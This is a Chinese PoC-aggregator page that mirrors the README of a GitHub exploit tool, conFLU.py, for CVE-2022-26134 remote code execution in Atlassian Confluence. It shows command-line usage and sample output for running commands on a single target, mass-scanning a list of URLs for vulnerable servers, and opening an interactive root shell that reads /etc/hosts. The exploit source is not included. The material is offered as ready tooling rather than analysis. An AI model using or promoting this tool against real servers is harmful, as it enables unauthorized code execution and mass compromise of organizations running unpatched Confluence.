漏洞平台

POC详情： 440ccbacfa5d40865dc219b39554bba798a46402

来源

https://github.com/Luchoane/CVE-2022-26134_conFLU

关联漏洞

标题： Atlassian Confluence Server 注入漏洞 (CVE-2022-26134)
描述：Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能，并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server 和 Data Center 存在注入漏洞。攻击者利用该漏洞执行任意代码。以下产品及版本受到影响：1.3.0版本至7.4.17之前版本、7.13.0版本至7.13.7之前版本、7.14.0版本至7.14.3之前版本、7.15.0版本至 7.15.2之前版本、7.16.0版本至7.16.4之

描述

PoC for exploiting CVE-2022-26134 on Confluence

介绍

# CVE-2022-26134 - conFLU

PoC for exploiting CVE-2022-26134 on Atlassian Confluence

### Exploit Usage

```
python3 conFLU.py -h
Usage: conFLU.py [-h] [-u URL] [-f F] [-cmd CMD]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  ```
  

#### Exploit single target:
```
$ python3 conFLU.py -u http://[redacted].com -c id


                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

[++++++] VULNERABLE: https://xxx.xxx.xxx.xxx | [uid=1009(confluence) gid=1009(confluence) groups=1009(confluence)]
```



#### Exploit url list
```
$ python3 conFLU.py -f list.txt -c id

                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

[-] NOT VULNERABLE: https://xxx.xxx.xxx.xxx
[!] There was an error connecting!
[!] There was an error connecting!
[++++++] VULNERABLE: https://xxx.xxx.xxx.xxx | [uid=1009(confluence) gid=1009(confluence) groups=1009(confluence)]

--------------------------
Vulnerable targets scanned:
[+] https://xxx.xxx.xxx.xxx
```



#### Interactive shell
```
$ python3 conFLU.py -s xxx.xxx.xxx.xxx

                           ******** **       **     **
                          /**///// /**      /**    /**
  *****   ******  ******* /**      /**      /**    /**
 **///** **////**//**///**/******* /**      /**    /**
/**  // /**   /** /**  /**/**////  /**      /**    /**
/**   **/**   /** /**  /**/**      /**      /**    /**
//***** //******  ***  /**/**      /********//*******
 /////   //////  ///   // //       ////////  ///////

                       </coded by Luchoane>

Welcome to the interactive shell for: https://xxx.xxx.xxx.xxx
User: root

> id
uid=0(root) gid=0(root) groups=0(root)

> cat /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1         localhost6 localhost6.localdomain6

> 
```

文件快照

 [4.0K]  /data/pocs/440ccbacfa5d40865dc219b39554bba798a46402
├── [4.9K]  conFLU.py
└── [2.7K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。